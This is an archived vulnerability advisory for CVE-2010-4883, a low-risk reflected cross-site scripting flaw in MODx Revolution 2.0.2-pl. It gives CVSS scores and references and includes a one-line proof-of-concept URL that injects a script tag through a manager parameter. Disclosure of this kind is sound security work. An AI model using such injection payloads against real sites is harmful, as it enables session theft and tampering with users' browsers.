MODx Revolution 2.0.2-pl reflected cross site scripting vulnerability

2010.09.30
Credit: John Leitch
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2010-4883
CWE: CWE-79


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

------------------------------------------------------------------------ Software................MODx Revolution 2.0.2-pl Vulnerability...........Reflected Cross-site Scripting Download................http://modxcms.com Release Date............9/28/2010 Tested On...............Windows Vista + XAMPP ------------------------------------------------------------------------ Author..................John Leitch Site....................http://www.johnleitch.net/ Email...................john.leitch5@gmail.com ------------------------------------------------------------------------ --Description-- A reflected cross-site scripting vulnerability in MODx Revolution 2.0.2-pl can be exploited to execute arbitrary JavaScript. --PoC-- http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

References:

http://modxcms.com/forums/index.php/topic,55105.0.html
http://xforce.iss.net/xforce/xfdb/62070
http://www.securityfocus.com/bid/43577
http://www.osvdb.org/68264
http://secunia.com/advisories/41638
http://packetstormsecurity.org/1009-exploits/modx202pl-xss.txt
http://modxcms.com/forums/index.php/topic,55104.0.h1590tml


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top